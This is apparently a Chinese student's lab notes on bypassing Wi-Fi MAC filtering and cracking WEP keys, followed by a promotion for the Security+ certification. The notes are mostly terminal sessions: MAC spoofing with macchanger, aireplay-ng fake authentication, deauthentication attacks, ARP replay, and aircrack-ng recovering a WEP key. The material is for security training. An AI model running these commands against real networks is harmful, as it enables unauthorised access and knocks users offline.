【安全牛學習筆記】Mac地址綁定攻擊
| MAC地址綁定攻擊 |
| MAC綁定 管理員誤以為MAC綁定是一種安全機制 限制可以關聯的客戶端MAC地址 準備AP AP基本配置 Open認證 開啟無線過濾 修改MAC地址繞過過濾 |
[email protected]:~# ifconfig
inet addr:192.168.20.8 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fefd:1c9d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 MetricL:1
Rx packets:0 errors:0 dropped:0 overruns:0 frame:0
Tx packets:50 errors:0 dropped:0 overruns:0 carrier:0
Rx bytes:1200 (0.0 KiB) TX bytes:1200 (0.0 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet addr. ::1/128 Scope:Host
UP LOOKBACK RUNNING MTU:65536 MetricL:1
Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
collisions:0 txqueuelen:0
Rx bytes:1200 (1.1 KiB) TX bytes:1200 (1.1 KiB)
wlan2 Link encap:Ethernet HWaddr 08:57:00:0c:96:68
UP BROADCAST MULTICAST MTU:1500 Metric:1
Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
Rx bytes:0 (0.0 B) TX bytes:0 (0.0 B)
[email protected]:~# service network-manager stop
[email protected]:~# airmon-ng check kill
Killing these processes:
PID Name
718 dnclinet
931 wpa_supplicant
[email protected]:~# airmon-ng start wlan2
No interfering processes found
PHY Interface Driver Chipest
phy0 wlan2 ath9k_htc Atheros Communications, Inc, AR9271 802.11n
(mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)
[email protected]:~# iwconfig
eth0 no wireless extensions
wlan2mon IEEE 802.11bgn Mode:Monitor Frequency:2.57 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions
[email protected]:~# iwlist wlan2mon channel
wlan2 13 channels in total; avaiable frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.457 GHz (Channel 10)
[email protected]:~# iw dev wlan2mon set channel 11 //啟用11信道
[email protected]:~# iwlist wlan2mon channel
wlan2 13 channels in total; avaiable frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.462 GHz (Channel 11)
[email protected]:~# airmon-ng wlan2mon //偵聽附近所有的AP和客戶
[email protected]:~# airmon-ug stop wlan2mon
[email protected]:~# airmon-ng start wlan2 11 //直接啟用11信道進行監聽
[email protected]:~# iwlist wlan2mon channel
wlan2 13 channels in total; avaiable frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.462 GHz (Channel 11)
[email protected]:~# airodump-ng wlan2mon //偵聽附近所有的AP和客戶
------------------------------------------------------------
[email protected]:~# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:fd:1c:9d
inet addr:192.168.20.8 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fefd:1c9d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 MetricL:1
Rx packets:0 errors:0 dropped:0 overruns:0 frame:0
Tx packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
Rx bytes:1200 (0.0 KiB) TX bytes:1200 (0.0 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet addr. ::1/128 Scope:Host
UP LOOKBACK RUNNING MTU:65536 MetricL:1
Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
Rx bytes:1200 (1.1 KiB) TX bytes:1200 (1.1 KiB)
wlan2 Link encap:Ethernet HWaddr 08:57:00:0c:96:68
UP BROADCAST MULTICAST MTU:1500 Metric:1
Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
Rx bytes:0 (0.0 B) TX bytes:0 (0.0 B)
[email protected]:~# airmon-ng start wlan2 11 //直接啟用11信道進行監聽
Found 2 processes that could cause trouble.
If airodump, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1944 avahi-deamon
1945 avahi-deamon
PHY Interface Driver Chipest
phy0 wlan2 ath9k_htc Atheros Communications, Inc, AR9271 802.11n
(mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)
[email protected]:~# iwconfig
eth0 no wireless extensions
wlan2mon IEEE 802.11bgn Mode:Monitor Frequency:2.57 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions
[email protected]:~# iwlist wlan2mon channel
wlan2 13 channels in total; avaiable frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.462 GHz (Channel 11)
[email protected]:~# airodump-ng wlan2mon -c 11 //偵聽信道11附近所有的AP和客戶
[email protected]:~# airodump-ng wlan2mon -c 11 --bssid EC:26:CA:DC:29:B6
[email protected]:~# ifconfig wlan0 down
[email protected]:~# macchanger -m 68:3E:34:30:0F:AA wlan0
Current MAC: c8:3a:35:ca:46:91 (Tenda Technology Co., Ltd.)
Permanent MAC: c8:3a:35:ca:46:91 (Tenda Technology Co., Ltd.)
New MAC: 68:3e:34:30:0f:aa (unknown)
[email protected]:~# ifconfig wlan0 up
[email protected]:~# ifconfig
[email protected]:~# airodump-ng wlan2mon -c 11 --bssid 68:3e:34:30:0f:aa
| WEP攻擊 |
| WEP共享密鑰破解 WEP密碼破解原理 IV並非完全隨機 每224個包可能出現一次IV重用 收集大量IV之後找到相同IV及其對應密碼文,分析得出共享密碼 ARP回包中包含IV IV足夠多的情況下,任何復雜程度的wep密碼都可以被破解 |
[email protected]:~# airodump-ng wlan2mon
[email protected]:~# airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wep wlan2mon
| WEP共享密鑰破解 啟動monitor模式 啟動抓包並保存抓包 Deauthentication抓包XOR文件 利用XOR文件與AP建立關聯 執行ARP重放 Deauthenticiation觸發ARP數據包 收集足夠DATA之後破解密碼 |
[email protected]:~# ls
wep-01.csv wep-01.kismet.csv wep-01-EC-26-CA-DC-29-86.xor wep-01.kisment.netxml
[email protected]:~# cat wep-01-EC-26-CA-DC-29-86.xor //查看的是一個密文
[email protected]:~# aireplay-ng --help
Aireplay-ng 1.2 rc2 - (C) 2006-2014 Thomas d‘Otreppe
http://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
--ignore-negative-one : if the interface‘s channel can‘t be determined,
ignore the mismatch, needed for unpatched cfg80211
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
[email protected]:~# aireplay-ng -1 60 -e kifi -y wep-01-EC-26-CA-DC-29-86.xor -a EC:26:CA:DC:29:B6 -h 08-57-00-0C-96-68 wlan2mon
//第一種註入方式,每60秒發一次authentication進行身份認證,關聯目標wifibSSID,密鑰流,AP,本機網卡的manage地址
21:44:21 Waiting for beacon frame (BSSID: EC:26:CA:DC:29:B6) on channel
21:44:21 Sending Authentication Request (Shared Key) [ACK]
21:44:21 Authentication 1/2 successful
21:44:21 Sending encrypted challege. [ACK]
21:44:21 Authentication 2/2 successful
21:44:21 Sending Association Request [ACK]
21:44:21 Association successful :-) (AID: 1)
21:44:36 Sending keep-alive packet [ACK]
21:44:51 Sending keep-alive packet [ACK]
21:45:06 Sending Authentication Request (Shared Key) [ACK]
21:45:21 Authentication 1/2 successful
21:45:21 Sending encrypted challege. [ACK]
21:45:21 Authentication 2/2 successful
21:45:21 Sending Association Request [ACK]
21:45:21 Association successful :-) (AID: 1)
21:45:36 Sending keep-alive packet [ACK]
21:45:51 Sending keep-alive packet [ACK]
21:46:06 Sending keep-alive packet [ACK]
21:45:06 Sending Authentication Request (Shared Key) [ACK]
21:47:21 Authentication 1/2 successful
21:47:21 Sending encrypted challege. [ACK]
21:47:21 Authentication 2/2 successful
21:47:21 Sending Association Request [ACK]
21:47:21 Association successful :-) (AID: 1)
21:47:36 Sending keep-alive packet [ACK]
[email protected]:~# aireplay-ng -0 1 -a EC:26:CA:DC:29:B6 -C 68:3E:34:30:0F:AA wlan2mon //解除關聯關系
21:54:29 Waiting for beacon frame (BSSID: EC:26:CA:DC:29:B6) on channel 11
21:54:29 Sending 64 directed DeAuth. STMAC: [68:3E:34:30:0F:AA] [ 2|64 ACKs]
[email protected]:~# aireplay-ng -0 10 -a EC:26:CA:DC:29:B6 -C 68:3E:34:30:0F:AA wlan2mon
[email protected]:~# aireplay-ng -3 -b EC:26:CA:DC:29:B6 -h 08:57:00:0C:96:68 wlan2mon
21:42:17 Waiting for beacon frame (BSSID: Ec:26:CA:DC:29:B6) on channel 11
Saving ARP requests in replay_arp-1105-214217.cap
you shoule also start airodump-ng to capture relies.
Read 20814 packets (got 0 ARP request and 0 ACKs),sent 0 packets...(0 pps)
[email protected]:~# aireplay-ng -0 2 -a EC:26:CA:DC:29:B6 -c 68:3E:34:30:0F:AA wlanmon //把客戶端打掉然後重連
[email protected]:~# ls
wep-01.csv wep-01.kismet.csv wep-01-EC-26-CA-DC-29-86.xor wep-01.kisment.netxml replay_arp-1105-214217.cap wep-01.cap
[email protected]:~# wireshark wep-01.cap
[email protected]:~# aircrack-ng wep-01.cap
Aircrack-ng 1.2 rc2
KB depth bytes(vote)
0 0/ 2 31(247040) 80(195072) EO(193280) 51(193024) 0A(192000) 4B(190464) 85(190464) BE(190208) 78(189696) EF(189696) 2C(189184)
1 1/ 2 77(198912) A1(195584) 2F(195816) 95(193024) E6(192512) B5(190976) 1F(189696) 60(189184) AE(188672) 7A(188416) BB(188426)
2 8/ 2 9B(189184) 3A(188672) D7(188672) EC(188672) 6C(188416) 25(187648) FE(187648) 9A(186880) E4(186880) BB(186624) 27(185856)
3 0/ 4 A2(240896) 4E(190464) A5(189952) FB(189184) DB(188928) 18(188672) 12(188160) 28(187648) 42(187136) F1(186880) 0E(186624)
4 91/ 4 E7(178944) 74(178688) AC(178688) 5F(178432) 65(178432) 90(178432) C6(178176) 3E(177920) 42(177920) B7(177920) BA(177920)
KEY FOUND! [ 31:32:33:34:35:36:37:38:39:30:31:32:33 ] (ASCII: 1234567890123 )
Decrypted correctly: 100%
| FAKE AUTHENTICATION WEP破解全部需要首先偽造認證,以便於AP進行正常通信 不產生ARP數據包 aireplay-ng -1 0 -e kifi -a <AP MAC> -h <Your MAC> <interface> aireplay-ng -1 60 -0 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC><interface> 每60000秒發送reauthenticiation -o 1 每次身份認證只發一組認證數據 -q 10 每10秒發keep-live幀 |
| FAKE AUTHENTICATION 某些AP驗證客戶端MAC地址OUI (前三個字節) MAC地址過濾 Denied (Code 1) is WPA in use WPA/WPA2不支持Fake authentication 使用真實MAC地址 物理靠近AP 偵聽信道正確 |
| FAKE AUTHENTICATION排錯 物理足夠接近被攻擊者 與被攻擊者使用相同無線標準b、n、g 客戶端可能拒絕廣播幀,建議制定客戶端 |
ARP重放 aireplay-ng -3 -b <AP MAC> -h <Source MAC><interface name> |
| WEP破解 Airecrack-ng wep.cap |
該筆記為安全牛課堂學員筆記,想看此課程或者信息安全類幹貨可以移步到安全牛課堂
Security+認證為什麽是互聯網+時代最火爆的認證?
牛妹先給大家介紹一下Security+
Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。
通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。
Security+認證如此火爆的原因?
原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的, Security+認證正好可以彌補信息安全技術領域的空白 。
目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。
原因二: IT運維人員工作與翻身的利器。
在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝著網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。
原因三:接地氣、國際範兒、考試方便、費用適中!
CompTIA作為全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。
在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成為最火爆的信息安全認證。
本文出自 “11662938” 博客,請務必保留此出處http://11672938.blog.51cto.com/11662938/1967652
【安全牛學習筆記】Mac地址綁定攻擊